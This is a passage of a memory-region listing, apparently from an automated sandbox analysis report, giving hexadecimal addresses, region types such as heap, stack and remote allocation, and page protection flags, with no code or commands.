page read and write
|
||
|
20FC8000
|
heap
|
page read and write
|
||
|
27762D0A000
|
heap
|
page read and write
|
||
|
532F000
|
heap
|
page read and write
|
||
|
7830000
|
trusted library allocation
|
page read and write
|
||
|
1326FB3D000
|
heap
|
page read and write
|
||
|
4D28000
|
heap
|
page read and write
|
||
|
4D5E000
|
heap
|
page read and write
|
||
|
1326F8F9000
|
heap
|
page read and write
|
||
|
1326F8D5000
|
heap
|
page read and write
|
||
|
1326F90D000
|
heap
|
page read and write
|
||
|
3220000
|
trusted library allocation
|
page read and write
|
||
|
5331000
|
heap
|
page read and write
|
||
|
201B0000
|
direct allocation
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
4D21000
|
heap
|
page read and write
|
||
|
4F80000
|
heap
|
page read and write
|
||
|
2E90000
|
heap
|
page read and write
|
||
|
13271320000
|
heap
|
page read and write
|
||
|
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
|
1326F926000
|
heap
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
1CAD2BE000
|
stack
|
page read and write
|
||
|
7FFD348A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
27C0000
|
heap
|
page read and write
|
||
|
5332000
|
heap
|
page read and write
|
||
|
1CAD1FE000
|
stack
|
page read and write
|
||
|
31A0000
|
trusted library section
|
page read and write
|
||
|
13271325000
|
heap
|
page read and write
|
||
|
1326F942000
|
heap
|
page read and write
|
||
|
1DBAE382000
|
heap
|
page read and write
|
||
|
20E8B000
|
unclassified section
|
page execute and read and write
|
||
|
5362000
|
heap
|
page read and write
|
||
|
4C30000
|
heap
|
page read and write
|
||
|
1327182B000
|
heap
|
page read and write
|
||
|
532B000
|
heap
|
page read and write
|
||
|
2EE0000
|
heap
|
page read and write
|
||
|
4A48000
|
heap
|
page read and write
|
||
|
30AD000
|
heap
|
page read and write
|
||
|
1DB95F84000
|
trusted library allocation
|
page read and write
|
||
|
5030000
|
heap
|
page read and write
|
||
|
5FB2000
|
trusted library allocation
|
page read and write
|
||
|
4F81000
|
heap
|
page read and write
|
||
|
1DB96227000
|
trusted library allocation
|
page read and write
|
||
|
5FA1000
|
trusted library allocation
|
page read and write
|
||
|
1DBA5D61000
|
trusted library allocation
|
page read and write
|
||
|
532D000
|
heap
|
page read and write
|
||
|
2FE1000
|
heap
|
page read and write
|
||
|
324E000
|
stack
|
page read and write
|
||
|
21051000
|
heap
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
79A0000
|
heap
|
page read and write
|
||
|
532F000
|
heap
|
page read and write
|
||
|
7190000
|
direct allocation
|
page read and write
|
||
|
532D000
|
heap
|
page read and write
|
||
|
5386000
|
heap
|
page read and write
|
||
|
100AFE000
|
stack
|
page read and write
|
||
|
4AA0000
|
trusted library allocation
|
page read and write
|
||
|
31A5000
|
heap
|
page read and write
|
||
|
535E000
|
heap
|
page read and write
|
||
|
321A000
|
heap
|
page read and write
|
||
|
5220000
|
heap
|
page read and write
|
||
|
1DBAE348000
|
heap
|
page read and write
|
||
|
321E000
|
stack
|
page read and write
|
||
|
5340000
|
heap
|
page read and write
|
||
|
27762CC0000
|
heap
|
page read and write
|
||
|
1326FB35000
|
heap
|
page read and write
|
||
|
20CFC000
|
stack
|
page read and write
|
||
|
1326F90C000
|
heap
|
page read and write
|
||
|
1DB93E60000
|
heap
|
page read and write
|
||
|
1DB96215000
|
trusted library allocation
|
page read and write
|
||
|
1326F8E8000
|
heap
|
page read and write
|
||
|
2F8D000
|
heap
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
7150000
|
direct allocation
|
page read and write
|
||
|
20A4E000
|
stack
|
page read and write
|
||
|
55A2000
|
trusted library allocation
|
page read and write
|
||
|
76E0000
|
heap
|
page read and write
|
||
|
1327132E000
|
heap
|
page read and write
|
||
|
1326F929000
|
heap
|
page read and write
|
||
|
20FDB000
|
heap
|
page read and write
|
||
|
533C000
|
heap
|
page read and write
|
||
|
1DBA5DCE000
|
trusted library allocation
|
page read and write
|
||
|
535D000
|
heap
|
page read and write
|
||
|
5342000
|
heap
|
page read and write
|
||
|
2F8E000
|
stack
|
page read and write
|
||
|
1CAD0FE000
|
stack
|
page read and write
|
||
|
2E24000
|
heap
|
page read and write
|
||
|
4AB0000
|
heap
|
page read and write
|
||
|
20130000
|
direct allocation
|
page read and write
|
||
|
71A0000
|
direct allocation
|
page read and write
|
||
|
316E000
|
stack
|
page read and write
|
||
|
1327181E000
|
heap
|
page read and write
|
||
|
20FF4000
|
heap
|
page read and write
|
||
|
1326F8D5000
|
heap
|
page read and write
|
||
|
1DBAE0C0000
|
heap
|
page read and write
|
||
|
3C33000
|
remote allocation
|
page execute and read and write
|
||
|
7FFD34962000
|
trusted library allocation
|
page read and write
|
||
|
1DBAE297000
|
heap
|
page execute and read and write
|
||
|
1DB93FA0000
|
heap
|
page read and write
|
||
|
2D9C000
|
stack
|
page read and write
|
||
|
1DB94280000
|
heap
|
page read and write
|
||
|
31D4000
|
trusted library allocation
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
275D000
|
stack
|
page read and write
|
||
|
5321000
|
heap
|
page read and write
|
||
|
3268000
|
heap
|
page read and write
|
||
|
779F000
|
heap
|
page read and write
|
||
|
7FFD34AF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
|
784D000
|
trusted library allocation
|
page read and write
|
||
|
5520000
|
trusted library allocation
|
page read and write
|
||
|
5068000
|
heap
|
page read and write
|
||
|
8A40000
|
trusted library allocation
|
page execute and read and write
|
||
|
533C000
|
heap
|
page read and write
|
||
|
5128000
|
heap
|
page read and write
|
||
|
1DB97B40000
|
trusted library allocation
|
page read and write
|
||
|
1326F94F000
|
heap
|
page read and write
|
||
|
2F50000
|
heap
|
page read and write
|
||
|
1DB94025000
|
heap
|
page read and write
|
||
|
4C7E000
|
stack
|
page read and write
|
||
|
5221000
|
heap
|
page read and write
|
||
|
5386000
|
heap
|
page read and write
|
||
|
308E000
|
stack
|
page read and write
|
||
|
21320000
|
heap
|
page read and write
|
||
|
31DF000
|
stack
|
page read and write
|
||
|
2E24000
|
heap
|
page read and write
|
||
|
5334000
|
heap
|
page read and write
|
||
|
321A000
|
heap
|
page read and write
|
||
|
1DB965B6000
|
trusted library allocation
|
page read and write
|
||
|
2E24000
|
heap
|
page read and write
|
||
|
1DB94190000
|
trusted library allocation
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
7A00000
|
trusted library allocation
|
page read and write
|
||
|
27762ED0000
|
heap
|
page read and write
|
||
|
4B8E000
|
stack
|
page read and write
|
||
|
4BCE000
|
stack
|
page read and write
|
||
|
1CAD23E000
|
unkown
|
page read and write
|
||
|
532F000
|
heap
|
page read and write
|
||
|
7A70000
|
trusted library allocation
|
page read and write
|
||
|
31E9000
|
trusted library allocation
|
page read and write
|
||
|
319E000
|
stack
|
page read and write
|
||
|
13271361000
|
heap
|
page read and write
|
||
|
27763014000
|
heap
|
page read and write
|
||
|
2F76000
|
heap
|
page read and write
|
||
|
4DB5000
|
heap
|
page execute and read and write
|
||
|
8490000
|
trusted library allocation
|
page read and write
|
||
|
5342000
|
heap
|
page read and write
|
||
|
5520000
|
trusted library allocation
|
page read and write
|
||
|
1326F947000
|
heap
|
page read and write
|
||
|
13271333000
|
heap
|
page read and write
|
||
|
1DBAE2B0000
|
heap
|
page read and write
|
||
|
2C5F000
|
stack
|
page read and write
|
||
|
1326F94E000
|
heap
|
page read and write
|
||
|
2E24000
|
heap
|
page read and write
|
||
|
1326F8F5000
|
heap
|
page read and write
|
||
|
7868000
|
trusted library allocation
|
page read and write
|
||
|
5351000
|
heap
|
page read and write
|
||
|
32A3000
|
heap
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
1326FB38000
|
heap
|
page read and write
|
||
|
1327133A000
|
heap
|
page read and write
|
||
|
1CACF7E000
|
stack
|
page read and write
|
||
|
774E000
|
heap
|
page read and write
|
||
|
293E000
|
stack
|
page read and write
|
||
|
2D70000
|
heap
|
page read and write
|
||
|
13271470000
|
heap
|
page read and write
|
||
|
5348000
|
heap
|
page read and write
|
||
|
8520000
|
trusted library allocation
|
page execute and read and write
|
||
|
20530000
|
heap
|
page read and write
|
||
|
511C000
|
heap
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
5332000
|
heap
|
page read and write
|
||
|
4B3E000
|
stack
|
page read and write
|
||
|
8AF0000
|
direct allocation
|
page read and write
|
||
|
5362000
|
heap
|
page read and write
|
||
|
8467000
|
stack
|
page read and write
|
||
|
13271346000
|
heap
|
page read and write
|
||
|
1326F8E8000
|
heap
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
510C000
|
heap
|
page read and write
|
||
|
1326F906000
|
heap
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
2E24000
|
heap
|
page read and write
|
||
|
533C000
|
heap
|
page read and write
|
||
|
532B000
|
heap
|
page read and write
|
||
|
1326F93C000
|
heap
|
page read and write
|
||
|
8891000
|
heap
|
page read and write
|
||
|
5221000
|
heap
|
page read and write
|
||
|
30D0000
|
heap
|
page read and write
|
||
|
4D00000
|
heap
|
page read and write
|
||
|
1CACFFE000
|
stack
|
page read and write
|
||
|
2BAC000
|
stack
|
page read and write
|
||
|
76FA000
|
heap
|
page read and write
|
||
|
511C000
|
heap
|
page read and write
|
||
|
9333000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
|
1CAD53E000
|
stack
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
1DB95D61000
|
trusted library allocation
|
page read and write
|
||
|
5358000
|
heap
|
page read and write
|
||
|
20930000
|
direct allocation
|
page read and write
|
||
|
1DB95D50000
|
heap
|
page execute and read and write
|
||
|
21763000
|
unclassified section
|
page execute and read and write
|
||
|
2F40000
|
heap
|
page readonly
|
||
|
1326F89D000
|
heap
|
page read and write
|
||
|
3290000
|
heap
|
page read and write
|
||
|
8610000
|
trusted library allocation
|
page read and write
|
||
|
1DB94110000
|
heap
|
page readonly
|
||
|
71B0000
|
direct allocation
|
page read and write
|
||
|
20AA0000
|
remote allocation
|
page read and write
|
||
|
510C000
|
heap
|
page read and write
|
||
|
209BF000
|
stack
|
page read and write
|
||
|
1327132F000
|
heap
|
page read and write
|
||
|
1DB95DE1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34940000
|
trusted library allocation
|
page execute and read and write
|
||
|
13271346000
|
heap
|
page read and write
|
||
|
1326F950000
|
heap
|
page read and write
|
||
|
2E24000
|
heap
|
page read and write
|
||
|
533C000
|
heap
|
page read and write
|
||
|
511C000
|
heap
|
page read and write
|
||
|
7F0000
|
heap
|
page read and write
|
||
|
B10000
|
heap
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
7FFD34AC0000
|
trusted library allocation
|
page read and write
|
||
|
79E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3483C000
|
trusted library allocation
|
page execute and read and write
|
||
|
5180000
|
direct allocation
|
page read and write
|
||
|
7FFD34931000
|
trusted library allocation
|
page read and write
|
||
|
1326F933000
|
heap
|
page read and write
|
||
|
1DB977C7000
|
trusted library allocation
|
page read and write
|
||
|
4D5E000
|
heap
|
page read and write
|
||
|
7A40000
|
trusted library allocation
|
page read and write
|
||
|
31A4000
|
heap
|
page read and write
|
||
|
31A4000
|
heap
|
page read and write
|
||
|
4AFC000
|
stack
|
page read and write
|
||
|
7FFD34AD0000
|
trusted library allocation
|
page read and write
|
||
|
536D000
|
heap
|
page read and write
|
||
|
7706000
|
heap
|
page read and write
|
||
|
2BA0000
|
heap
|
page readonly
|
||
|
1CAE20B000
|
stack
|
page read and write
|
||
|
533C000
|
heap
|
page read and write
|
||
|
4D30000
|
heap
|
page read and write
|
||
|
1DB95C9A000
|
heap
|
page read and write
|
||
|
1DB95B40000
|
heap
|
page execute and read and write
|
||
|
4EE0000
|
heap
|
page read and write
|
||
|
70D7000
|
trusted library allocation
|
page read and write
|
||
|
5190000
|
heap
|
page read and write
|
||
|
1326F892000
|
heap
|
page read and write
|
||
|
1326F8E0000
|
heap
|
page read and write
|
||
|
1DB93FE0000
|
trusted library allocation
|
page read and write
|
||
|
7ADB000
|
stack
|
page read and write
|
||
|
7FFD34A90000
|
trusted library allocation
|
page read and write
|
||
|
7A50000
|
trusted library allocation
|
page read and write
|
||
|
724A000
|
stack
|
page read and write
|
||
|
5386000
|
heap
|
page read and write
|
||
|
1DB95A33000
|
heap
|
page read and write
|
||
|
20D3F000
|
stack
|
page read and write
|
||
|
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
|
7800000
|
trusted library allocation
|
page read and write
|
||
|
4D38000
|
heap
|
page read and write
|
||
|
7DF422FB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
13271346000
|
heap
|
page read and write
|
||
|
1DB94000000
|
trusted library allocation
|
page read and write
|
||
|
31A4000
|
heap
|
page read and write
|
||
|
4C3F000
|
stack
|
page read and write
|
||
|
20EB6000
|
direct allocation
|
page execute and read and write
|
||
|
321B000
|
heap
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
2F20000
|
heap
|
page read and write
|
||
|
5340000
|
heap
|
page read and write
|
||
|
5386000
|
heap
|
page read and write
|
||
|
87FD000
|
stack
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
20190000
|
direct allocation
|
page read and write
|
||
|
1DB97C53000
|
trusted library allocation
|
page read and write
|
||
|
13271804000
|
heap
|
page read and write
|
||
|
533C000
|
heap
|
page read and write
|
||
|
2066C000
|
stack
|
page read and write
|
||
|
8695000
|
trusted library allocation
|
page read and write
|
||
|
13271321000
|
heap
|
page read and write
|
||
|
1DBA6057000
|
trusted library allocation
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
532B000
|
heap
|
page read and write
|
||
|
1CAD63F000
|
stack
|
page read and write
|
||
|
3120000
|
heap
|
page read and write
|
||
|
2F40000
|
heap
|
page read and write
|
||
|
2ECE000
|
stack
|
page read and write
|
||
|
13271326000
|
heap
|
page read and write
|
||
|
69C0000
|
direct allocation
|
page read and write
|
||
|
2F0F000
|
unkown
|
page read and write
|
||
|
510C000
|
heap
|
page read and write
|
||
|
74D000
|
stack
|
page read and write
|
||
|
20F51000
|
heap
|
page read and write
|
||
|
20160000
|
direct allocation
|
page read and write
|
||
|
5329000
|
heap
|
page read and write
|
||
|
537B000
|
heap
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
21021000
|
heap
|
page read and write
|
||
|
5321000
|
heap
|
page read and write
|
||
|
1327180A000
|
heap
|
page read and write
|
||
|
1DB94010000
|
heap
|
page read and write
|
||
|
8470000
|
heap
|
page read and write
|
||
|
201C0000
|
direct allocation
|
page read and write
|
||
|
7FFD34970000
|
trusted library allocation
|
page execute and read and write
|
||
|
100DFF000
|
stack
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
4E00000
|
heap
|
page execute and read and write
|
||
|
20B20000
|
heap
|
page read and write
|
||
|
4D2D000
|
heap
|
page read and write
|
||
|
4D40000
|
heap
|
page read and write
|
||
|
7180000
|
direct allocation
|
page read and write
|
||
|
7A30000
|
trusted library allocation
|
page read and write
|
||
|
7747000
|
heap
|
page read and write
|
||
|
210E9000
|
heap
|
page read and write
|
||
|
1327133F000
|
heap
|
page read and write
|
||
|
1DB95C72000
|
heap
|
page read and write
|
||
|
1326F8F5000
|
heap
|
page read and write
|
||
|
1326F891000
|
heap
|
page read and write
|
||
|
31DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
321A000
|
heap
|
page read and write
|
||
|
345F000
|
stack
|
page read and write
|
||
|
1326F8D5000
|
heap
|
page read and write
|
||
|
211BC000
|
heap
|
page read and write
|
||
|
532B000
|
heap
|
page read and write
|
||
|
3098000
|
heap
|
page read and write
|
||
|
31A5000
|
heap
|
page read and write
|
||
|
3170000
|
heap
|
page read and write
|
||
|
5328000
|
heap
|
page read and write
|
||
|
1326F900000
|
heap
|
page read and write
|
||
|
2101F000
|
heap
|
page read and write
|
||
|
1DB9401B000
|
heap
|
page read and write
|
||
|
533C000
|
heap
|
page read and write
|
||
|
72CB000
|
stack
|
page read and write
|
||
|
5342000
|
heap
|
page read and write
|
||
|
4F30000
|
heap
|
page read and write
|
||
|
4D21000
|
heap
|
page read and write
|
||
|
20920000
|
direct allocation
|
page read and write
|
||
|
8AA0000
|
direct allocation
|
page execute and read and write
|
||
|
5128000
|
heap
|
page read and write
|
||
|
13271346000
|
heap
|
page read and write
|
||
|
1DB95BA4000
|
heap
|
page read and write
|
||
|
C389D2D000
|
stack
|
page read and write
|
||
|
1326FB38000
|
heap
|
page read and write
|
||
|
536A000
|
heap
|
page read and write
|
||
|
5323000
|
heap
|
page read and write
|
||
|
5357000
|
heap
|
page read and write
|
||
|
5348000
|
heap
|
page read and write
|
||
|
535D000
|
heap
|
page read and write
|
||
|
1327132E000
|
heap
|
page read and write
|
||
|
85BE000
|
stack
|
page read and write
|
||
|
1326F926000
|
heap
|
page read and write
|
||
|
1CAD6BB000
|
stack
|
page read and write
|
||
|
20BFE000
|
stack
|
page read and write
|
||
|
20B7C000
|
stack
|
page read and write
|
||
|
5334000
|
heap
|
page read and write
|
||
|
8895000
|
heap
|
page read and write
|
||
|
5340000
|
heap
|
page read and write
|
||
|
1326F8C1000
|
heap
|
page read and write
|
||
|
5321000
|
heap
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
2DBB000
|
stack
|
page read and write
|
||
|
4DF9000
|
heap
|
page read and write
|
||
|
2FFA000
|
heap
|
page read and write
|
||
|
20C3F000
|
stack
|
page read and write
|
||
|
50CE000
|
heap
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
88C1000
|
heap
|
page read and write
|
||
|
533C000
|
heap
|
page read and write
|
||
|
79C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5386000
|
heap
|
page read and write
|
||
|
8889000
|
heap
|
page read and write
|
||
|
1DBA6048000
|
trusted library allocation
|
page read and write
|
||
|
795E000
|
stack
|
page read and write
|
||
|
50CE000
|
heap
|
page read and write
|
||
|
20140000
|
direct allocation
|
page read and write
|
||
|
2AFD000
|
stack
|
page read and write
|
||
|
300F000
|
stack
|
page read and write
|
||
|
2F5C000
|
heap
|
page read and write
|
||
|
1326F947000
|
heap
|
page read and write
|
||
|
1326FB39000
|
heap
|
page read and write
|
||
|
5321000
|
heap
|
page read and write
|
||
|
77AA000
|
heap
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
5358000
|
heap
|
page read and write
|
||
|
757E000
|
stack
|
page read and write
|
||
|
4D21000
|
heap
|
page read and write
|
||
|
4D92000
|
heap
|
page read and write
|
||
|
13271346000
|
heap
|
page read and write
|
||
|
1326F8AB000
|
heap
|
page read and write
|
||
|
5344000
|
heap
|
page read and write
|
||
|
5332000
|
heap
|
page read and write
|
||
|
21351000
|
heap
|
page read and write
|
||
|
1009FD000
|
stack
|
page read and write
|
||
|
50B8000
|
heap
|
page read and write
|
||
|
5348000
|
heap
|
page read and write
|
||
|
2F0F000
|
stack
|
page read and write
|
||
|
8480000
|
trusted library allocation
|
page execute and read and write
|
||
|
13271321000
|
heap
|
page read and write
|
||
|
1326F944000
|
heap
|
page read and write
|
||
|
1326F8E0000
|
heap
|
page read and write
|
||
|
20150000
|
direct allocation
|
page read and write
|
||
|
2DD4000
|
stack
|
page read and write
|
||
|
3219000
|
heap
|
page read and write
|
||
|
31A4000
|
heap
|
page read and write
|
||
|
5324000
|
heap
|
page read and write
|
||
|
2C0E000
|
unkown
|
page read and write
|
||
|
1DB93F40000
|
heap
|
page read and write
|
||
|
532B000
|
heap
|
page read and write
|
||
|
2D10000
|
heap
|
page read and write
|
||
|
3090000
|
heap
|
page read and write
|
||
|
1001FE000
|
stack
|
page read and write
|
||
|
7FFD34A60000
|
trusted library allocation
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
1326F906000
|
heap
|
page read and write
|
||
|
2D3D000
|
stack
|
page read and write
|
||
|
3240000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E60000
|
heap
|
page read and write
|
||
|
3205000
|
trusted library allocation
|
page execute and read and write
|
||
|
5321000
|
heap
|
page read and write
|
||
|
3BA0000
|
remote allocation
|
page execute and read and write
|
||
|
20FDC000
|
heap
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
31D3000
|
trusted library allocation
|
page execute and read and write
|
||
|
514D000
|
heap
|
page read and write
|
||
|
1DB94150000
|
trusted library allocation
|
page read and write
|
||
|
31A4000
|
heap
|
page read and write
|
||
|
5321000
|
heap
|
page read and write
|
||
|
5331000
|
heap
|
page read and write
|
||
|
50C5000
|
heap
|
page read and write
|
||
|
532B000
|
heap
|
page read and write
|
||
|
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
|
1DB94051000
|
heap
|
page read and write
|
||
|
1CACE7E000
|
stack
|
page read and write
|
||
|
4D20000
|
heap
|
page read and write
|
||
|
2F50000
|
heap
|
page read and write
|
||
|
5330000
|
heap
|
page read and write
|
||
|
4DF9000
|
heap
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
31C0000
|
trusted library allocation
|
page read and write
|
||
|
1326F926000
|
heap
|
page read and write
|
||
|
4D20000
|
heap
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
1326F90D000
|
heap
|
page read and write
|
||
|
5221000
|
heap
|
page read and write
|
||
|
5340000
|
heap
|
page read and write
|
||
|
20ADE000
|
stack
|
page read and write
|
||
|
21770000
|
unclassified section
|
page execute and read and write
|
||
|
1CAD17E000
|
stack
|
page read and write
|
||
|
730E000
|
stack
|
page read and write
|
||
|
1DBAE2A0000
|
heap
|
page read and write
|
||
|
5F9C000
|
trusted library allocation
|
page read and write
|
||
|
1326F906000
|
heap
|
page read and write
|
||
|
1326F947000
|
heap
|
page read and write
|
||
|
505C000
|
heap
|
page read and write
|
||
|
3202000
|
trusted library allocation
|
page read and write
|
||
|
7FD10000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DB9405B000
|
heap
|
page read and write
|
||
|
8B10000
|
trusted library allocation
|
page execute and read and write
|
||
|
20AA0000
|
remote allocation
|
page read and write
|
||
|
7FFD34920000
|
trusted library allocation
|
page read and write
|
||
|
533C000
|
heap
|
page read and write
|
||
|
4E69000
|
trusted library allocation
|
page read and write
|
||
|
1326F8FA000
|
heap
|
page read and write
|
||
|
5520000
|
trusted library allocation
|
page read and write
|
||
|
4D21000
|
heap
|
page read and write
|
||
|
100CFB000
|
stack
|
page read and write
|
||
|
21021000
|
heap
|
page read and write
|
||
|
325A000
|
heap
|
page read and write
|
||
|
8AC0000
|
direct allocation
|
page read and write
|
||
|
71C0000
|
direct allocation
|
page read and write
|
||
|
20AA0000
|
remote allocation
|
page read and write
|
||
|
7880000
|
trusted library allocation
|
page read and write
|
||
|
2DCF000
|
stack
|
page read and write
|
||
|
4D21000
|
heap
|
page read and write
|
||
|
1DB97B44000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A70000
|
trusted library allocation
|
page read and write
|
||
|
1326F930000
|
heap
|
page read and write
|
||
|
13271342000
|
heap
|
page read and write
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
7FFD34830000
|
trusted library allocation
|
page read and write
|
||
|
532F000
|
heap
|
page read and write
|
||
|
1CAD07C000
|
stack
|
page read and write
|
||
|
5062000
|
heap
|
page read and write
|
||
|
5348000
|
heap
|
page read and write
|
||
|
13271346000
|
heap
|
page read and write
|
||
|
532D000
|
heap
|
page read and write
|
||
|
1CAE08E000
|
stack
|
page read and write
|
||
|
21749000
|
unclassified section
|
page execute and read and write
|
||
|
5337000
|
heap
|
page read and write
|
||
|
5343000
|
heap
|
page read and write
|
||
|
5362000
|
heap
|
page read and write
|
||
|
5334000
|
heap
|
page read and write
|
||
|
2E24000
|
heap
|
page read and write
|
||
|
1DBAE374000
|
heap
|
page read and write
|
||
|
1004FE000
|
stack
|
page read and write
|
||
|
7FFD34A30000
|
trusted library allocation
|
page read and write
|
||
|
2E24000
|
heap
|
page read and write
|
||
|
1DB975FB000
|
trusted library allocation
|
page read and write
|
||
|
5386000
|
heap
|
page read and write
|
||
|
4A3E000
|
stack
|
page read and write
|
||
|
31A4000
|
heap
|
page read and write
|
||
|
4D20000
|
heap
|
page read and write
|
||
|
20BBC000
|
stack
|
page read and write
|
||
|
7FFD34784000
|
trusted library allocation
|
page read and write
|
||
|
5325000
|
heap
|
page read and write
|
||
|
720D000
|
stack
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
87BB000
|
stack
|
page read and write
|
||
|
5321000
|
heap
|
page read and write
|
||
|
5321000
|
heap
|
page read and write
|
||
|
884E000
|
heap
|
page read and write
|
||
|
532D000
|
heap
|
page read and write
|
||
|
2E24000
|
heap
|
page read and write
|
||
|
1326F7F0000
|
heap
|
page read and write
|
||
|
533C000
|
heap
|
page read and write
|
||
|
20170000
|
direct allocation
|
page read and write
|
||
|
4A88000
|
trusted library allocation
|
page read and write
|
||
|
20180000
|
direct allocation
|
page read and write
|
||
|
20F51000
|
heap
|
page read and write
|
||
|
3040000
|
heap
|
page read and write
|
||
|
857E000
|
stack
|
page read and write
|
||
|
533C000
|
heap
|
page read and write
|
||
|
20FF6000
|
heap
|
page read and write
|
||
|
558A000
|
trusted library allocation
|
page read and write
|
||
|
20E3F000
|
stack
|
page read and write
|
||
|
5379000
|
heap
|
page read and write
|
||
|
1DB94109000
|
heap
|
page read and write
|
||
|
5128000
|
heap
|
page read and write
|
||
|
1326F872000
|
heap
|
page read and write
|
||
|
3250000
|
heap
|
page read and write
|
||
|
4CFF000
|
stack
|
page read and write
|
||
|
7FFD34783000
|
trusted library allocation
|
page execute and read and write
|
||
|
1326F926000
|
heap
|
page read and write
|
||
|
200F0000
|
direct allocation
|
page read and write
|
||
|
1DBAE2BC000
|
heap
|
page read and write
|
||
|
2E40000
|
heap
|
page read and write
|
||
|
5321000
|
heap
|
page read and write
|
||
|
1DB940FA000
|
heap
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
50C6000
|
heap
|
page read and write
|
||
|
1326F8AB000
|
heap
|
page read and write
|
||
|
2085F000
|
stack
|
page read and write
|
||
|
883C000
|
stack
|
page read and write
|
||
|
5196000
|
heap
|
page read and write
|
||
|
5341000
|
heap
|
page read and write
|
||
|
217C6000
|
unclassified section
|
page execute and read and write
|
||
|
1326F89F000
|
heap
|
page read and write
|
||
|
5386000
|
heap
|
page read and write
|
||
|
2DD2000
|
stack
|
page read and write
|
||
|
27D0000
|
heap
|
page read and write
|
||
|
7A20000
|
trusted library allocation
|
page read and write
|
||
|
2174D000
|
unclassified section
|
page execute and read and write
|
||
|
1DB94120000
|
trusted library allocation
|
page read and write
|
||
|
1DBAE230000
|
heap
|
page read and write
|
||
|
2E20000
|
heap
|
page read and write
|
||
|
2F72000
|
heap
|
page read and write
|
||
|
7FFD34A20000
|
trusted library allocation
|
page read and write
|
||
|
217CC000
|
unclassified section
|
page execute and read and write
|
||
|
4D5E000
|
heap
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
5374000
|
heap
|
page read and write
|
||
|
1DB95C61000
|
heap
|
page read and write
|
||
|
205AE000
|
stack
|
page read and write
|
||
|
877C000
|
stack
|
page read and write
|
||
|
1DB95BB0000
|
heap
|
page read and write
|
||
|
850D000
|
stack
|
page read and write
|
||
|
7FFD34950000
|
trusted library allocation
|
page execute and read and write
|
||
|
533C000
|
heap
|
page read and write
|
||
|
20C7B000
|
stack
|
page read and write
|
||
|
20900000
|
direct allocation
|
page read and write
|
||
|
2F10000
|
heap
|
page read and write
|
||
|
205EE000
|
stack
|
page read and write
|
||
|
532F000
|
heap
|
page read and write
|
||
|
2E24000
|
heap
|
page read and write
|
||
|
88CF000
|
heap
|
page read and write
|
||
|
4D40000
|
heap
|
page read and write
|
||
|
1DB9620B000
|
trusted library allocation
|
page read and write
|
||
|
1DB96223000
|
trusted library allocation
|
page read and write
|
||
|
1DB97B55000
|
trusted library allocation
|
page read and write
|
||
|
4AB8000
|
heap
|
page read and write
|
||
|
1DBA5D70000
|
trusted library allocation
|
page read and write
|
||
|
522B000
|
heap
|
page read and write
|
||
|
1326F90F000
|
heap
|
page read and write
|
||
|
79F0000
|
trusted library allocation
|
page read and write
|
||
|
2E38000
|
stack
|
page read and write
|
||
|
2B29000
|
stack
|
page read and write
|
||
|
20FF4000
|
heap
|
page read and write
|
||
|
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
|
1326FB3D000
|
heap
|
page read and write
|
||
|
1DB95BB2000
|
heap
|
page read and write
|
||
|
535D000
|
heap
|
page read and write
|
||
|
216F0000
|
unclassified section
|
page execute and read and write
|
||
|
31EE000
|
stack
|
page read and write
|
||
|
1007FE000
|
stack
|
page read and write
|
||
|
7FFD34AA0000
|
trusted library allocation
|
page read and write
|
||
|
2081E000
|
stack
|
page read and write
|
||
|
2E24000
|
heap
|
page read and write
|
||
|
5320000
|
heap
|
page read and write
|
||
|
8A80000
|
trusted library allocation
|
page read and write
|
||
|
7A10000
|
trusted library allocation
|
page read and write
|
||
|
B0E000
|
stack
|
page read and write
|
||
|
4D21000
|
heap
|
page read and write
|
||
|
4F81000
|
heap
|
page read and write
|
||
|
77B6000
|
heap
|
page read and write
|
||
|
31A5000
|
heap
|
page read and write
|
||
|
321A000
|
